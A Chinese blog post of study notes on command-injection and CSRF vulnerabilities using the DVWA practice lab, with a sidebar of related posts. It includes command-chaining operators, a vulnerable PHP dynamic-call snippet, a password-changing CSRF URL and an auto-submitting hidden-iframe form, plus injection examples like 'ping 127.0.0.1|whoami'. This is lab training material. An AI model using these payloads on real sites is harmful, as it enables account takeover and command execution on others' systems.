命令(?命令学习)与csrf漏洞

最新推荐文章于 2023-10-15 14:06:30 发布
最新推荐文章于 2023-10-15 14:06:30 发布
阅读量90 收藏
点赞数
分类专栏: dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51177088/article/details/117228856
版权

文章目录

命令执行漏洞

命令连接符

&&	第一个命令执行成功后,才会执行第二个命令。
||	第一个命令执行失败,才会执行第二个
|	作为管道符,将|前面命令的输出作为|后面的输入
&	同时执行多条命令,不管命令是否执行成功
#Linux下
;   命令依次执行

php命令执行

  1. 命令执行
    php提供了部分函数来执行外部应用程序,如:system() shell_exec() exec() passthru()
system() 				有回显
pssthru()				有回显
exec()					回显最后一行
shell_exec()			无回显

在这里插入代码片

  1. 代码执行
    eval()函数,可以把字符串按照PHP代码动态执行(必须分号结尾)

  2. 动态函数调用
    php支持动态函数调用

  3. 危险函数
    https://blog.csdn.net/qq_43431158/article/details/99673451参考这个博主整理的

在这里插入代码片

<?php
function A(){
return "A 函数调用";
}
$fun = $_REQUEST['fun'];
echo $fun();

#此时,动态调用存在安全隐患,如再url中传参fun=phpinfo

dvwa实例(high

在这里插入图片描述
利用黑名单防御,只要用空格即可被绕过
在这里插入图片描述

windows命令与Linux命令(待补充

CSRF漏洞

原理

理解;CSRF是指跨站请求伪造,攻击者利用受害者身份进行某些操作
重点:
CSRF的攻击建立在浏览器与web服务器的会话中(会话有效
欺骗用户访问恶意URL

dvwa实例(low

get方法
构造url,发送给正在网页登陆中的用户,只要用户点击链接,即被修改密码

http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=%B8%C4%B1%E4#

post方法自动提交表单

<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<title></title>
	</head>
	<body>
	//上述请求的url在<iframe>中打开,而<iframe>会被隐藏
		<iframe frameborder="0" name="myiframe" width="0px" height="0px"></iframe>
		//如果不想跳转,悄悄提交可用target
		<form id="csrf" method="post" target="myiframe" action="http://127.0.0.1/DVWA-master/vulnerabilities/csrf/">
			<input type="hidden" name="password_new" value="admin"/>
			<input type="hidden" name="password_conf" value="admin"/>
			<input type="hidden" name="Change" value="Change"/>
			//<input type="submit" value="haha" /> 利用js自动提交表单
		</form>
		<script>
		//js实现自动提交表单
			var csrf = document.getElementById("csrf");
			csrf.submit();
		</script>
	</body>
</html>

medium
只要构造一个html页面,并放到一个名为127.0.0.1的目录下即可,见refer的绕过

防御与破解

  1. referer的作用就是记录你在访问一个目标网站时,在访问前你的原网站的地址
    refer的绕过(转载)

  2. token
    浏览器同源策略(转载)
    利用xss可获得token

qq_51177088
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令执行+CSRF
06-11
本节课程分两个方面,命令执行包含os命令执行、struts2远程命令执行、变量覆盖。CSRF漏洞包含GET型及POST型两种类型的CSRF漏洞,每种漏洞不仅包含原理分析还包含攻击过程演示。
命令执行漏洞
weixin_44368248的博客
02-21 3547
命令执行漏洞简介及其常见绕过
windows和linux常用管道符
记录日常学习
06-23 237
管道符:;、|、||、&、&&
在 Windows 操作系统下使用管道符(|)将输出作为输入,并使用 “more“ 命令实现分页显示
最新发布
qq_36591160的博客
10-15 464
/C "cmd /c if @isdir==FALSE echo del @file" :对每个文件运行的命令,判断是否为文件并输出删除命令。在 Windows 操作系统下使用管道符(|)将输出作为输入,并使用 "more" 命令实现分页显示。- 在 Windows 操作系统中使用管道符实现类似 Linux 系统中的 "less" 命令效果。- /D -30 :选择最后修改日期在30天之前的文件。- | :管道符,将前一个命令的输出作为后一个命令的输入。- 使用 "more" 命令进行分页显示结果。
Linux 与 Windows【管道符】查看指定进程
书启鸿蒙知秋枫
09-07 841
Linux 与 Windows【管道符】查看指定进程
Windows批处理常用符号(2)
m0_59900155的博客
01-09 1434
Windows批处理常用符号
PHP漏洞全解1-9
09-16
1、命令注入(Command Injection) 2、eval 注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL 注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross ...
csrf-nosqli-xss-application:演示CSRF,NoSQL注入和XSS漏洞和保护的示例应用程序
05-11
这是一个示例应用程序,用于演示CSRF,NoSQL注入和XSS漏洞和保护。 master分支由unprotected分支和fix-*分支的合并组成,这意味着它包含的代码至少在理论上受到了上述三种类型的攻击的保护。 如果您发现任何缺陷,...
PHP漏洞全解
02-12
1、命令注入(Command Injection) 2、eval 注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL 注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross ...
SecExample:JAVA 漏洞靶场 (Vulnerability Environment For Java)
07-24
star:[CSRF漏洞]:glowing_star::glowing_star:[SSRF漏洞]:glowing_star::glowing_star:[CORS漏洞]:glowing_star::glowing_star::glowing_star::glowing_star:[反序列化漏洞-Fastjson反序列化]:glowing_star::glowing...
windows和linux系统常用管道符整理
Xiaokeo的博客
03-28 1654
Windows系列支持的管道符如下所示: “|” : 直接执行后面的语句。例如:ping 127.0.0.1| whoami “||” : 如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假。例如: ping 1234.1 || whoami “&” : 如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 。例如: ping 127.0.0.1 & whoami “&&” : 如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句只能为真。例如:
Windows与网络基础-8-windows基本命令-文本操作
w辣条小王子
08-31 616
Ipconfig >ip.txt 将ipconfig显示的接口信息写入到ip.txt文本文件中,如果ip.txt不存在,会自动创建该文件并写入。追加重定向:“>>“把前面的命令执行出来的结果,写入到后面的文件中,不会覆盖原来文件中的内容。而是叠加在原文件内容下面。将前面命令执行出来的结果,保存在某个内存中,再通过后面的命令执行前面命令的结果,即将。标准重定向:“>“ 把前面的命令执行出来的结果,写入到后面的文件中。参数 /C,忽略空格整体匹配,搜索字符串。没有/C 空格隔开搜索字符串,非整体匹配。....
管道符的一些命令
小小byg
03-30 711
uniq 命令用于检查及删除文本文件中重复出现的行列,一般与 sort 命令结合使用。
Windows和Linux上的管道符
叶子的Blog
11-15 689
Windows管道符 “|”: 直接执行后面的语句。如:ping 127.0.0.1|whoami “||”: 如果前面执行的语句出错泽执行后面的语句,前面的语句智能为假 如:ping 2 || whoami “&”: 如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 如 ping 127.0.0.1&whoami “&&”: 如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句只能为真。例如:ping 127.0.0.1&&
Windows中的管道解析
无与伦比BLOG
05-19 2546
具体来讲,Pipe是一种POSIX规范,在不同系统上都有实现。msvcrt提供了_pipe这个函数。但是,它的实现是基于CreatePipe,这是无庸置疑的。这种非标准(带下划线)的C函数,在CRT中的很多。比如_open返回的文件指针FIFL*,很多时候我们都没有注意到,它几乎等同于CreateFile传回来的HANDLE。在Windows核心编程中,我们知道,每个进程有一个句柄表。创建子进程时
视频教程-命令执行+CSRF-渗透测试
weixin_31547227的博客
05-28 212
命令执行+CSRF 曾在启明星辰、绿盟科技等大型企业安全公司就职,对金融、能...
管道符 |
计算机图形学
12-04 6749
|:管道符 1、什么是管道符? 管道符可以理解为:前一个命令的输出作为下一个命令的输入。 相当于生活中的管道连接两个端点。 2、管道符示例: ls | grep ^ s 结果: sbin selinux srv sys 3 、人生体会: ** 1+1&amp;gt;2 充分体现了组合、资源整合的重要性。** ...
ssrf与csrf漏洞的区别
04-01
SSRF(Server-Side Request ...总之,SSRF漏洞是服务端应用程序的漏洞,攻击者可以利用它来发送恶意请求到其他系统,而CSRF漏洞是用户身份验证的漏洞,攻击者可以利用它来利用用户的身份向服务端应用程序发送恶意请求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值